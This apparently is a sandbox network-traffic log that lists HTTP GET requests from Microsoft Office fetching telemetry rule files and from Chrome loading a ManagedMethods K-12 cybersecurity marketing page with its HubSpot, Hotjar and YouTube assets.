Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://get.managedmethods.com/hs-fs/hub/6834707/hub_generated/module_assets/25372454157/1581034302168/module_25372454157_Button.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hs/hsstatic/jquery-libs/static-1.1/jquery/jquery-1.7.1.js HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /_hcms/forms/v2.js HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /hs-fs/hubfs/MM%20Logos/ManagedMethods_Logo_NarrowWidth_ForLightBackgrounds_HEX_Color_150px.png?width=150&height=51&name=ManagedMethods_Logo_NarrowWidth_ForLightBackgrounds_HEX_Color_150px.png HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /content-cwv-embed/static-1.1293/embed.js HTTP/1.1Host: static.hsappstatic.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /hs/scriptloader/6834707.js HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /hs/hsstatic/HubspotToolsMenu/static-1.354/js/index.js HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /content-cwv-embed/static-1.1293/embed.js HTTP/1.1Host: static.hsappstatic.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /c/hotjar-1110137.js?sv=6 HTTP/1.1Host: static.hotjar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /hs/hsstatic/HubspotToolsMenu/static-1.354/js/index.js HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /hs/scriptloader/6834707.js HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /hubfs/Background.svg HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /_hcms/forms/embed/v3/form/6834707/b2b34cd6-93c2-44dd-9be1-38727a6852ef/json?hs_static_app=forms-embed&hs_static_app_version=1.6227&X-HubSpot-Static-App-Info=forms-embed-1.6227 HTTP/1.1Host: get.managedmethods.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165
Source: global trafficHTTP traffic detected: GET /modules.02161fb4f8ebb73fb3f8.js HTTP/1.1Host: script.hotjar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/slick-carousel/1.9.0/ajax-loader.gif HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick-theme.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /embed/t3Gl92wBomo?feature=oembed HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://get.managedmethods.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /leadflows.js HTTP/1.1Host: js.hsleadflows.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://get.managedmethods.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /collectedforms.js HTTP/1.1Host: js.hscollectedforms.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://get.managedmethods.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web-interactives-embed.js HTTP/1.1Host: js.hubspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://get.managedmethods.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fb.js HTTP/1.1Host: js.hsadspixel.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /6834707.js HTTP/1.1Host: js.hs-banner.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content-tools-menu/api/v1/tools-menu/has-permission-json?portalId=6834707 HTTP/1.1Host: app.hubspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /analytics/1728897000000/6834707.js HTTP/1.1Host: js.hs-analytics.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /conversations-embed.js HTTP/1.1Host: js.usemessages.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /c/hotjar-1110137.js?sv=6 HTTP/1.1Host: static.hotjar.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=forms-embed-v2-DEFINITION_SUCCESS&count=1 HTTP/1.1Host: forms-na1.hsforms.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/2f238d39/www-player.css HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.youtube.com/embed/t3Gl92wBomo?feature=oembedAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=LpahJvq5Rks; VISITOR_INFO1_LIVE=egqk30RKZ4k; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJQ%3D%3D
Source: global trafficHTTP traffic detected: GET /web-interactives/public/v1/embed/combinedConfigs?portalId=6834707&currentUrl=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&referrer=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&contentId=179553754383 HTTP/1.1Host: cta-service-cms2.hubspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /collectedforms.js HTTP/1.1Host: js.hscollectedforms.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
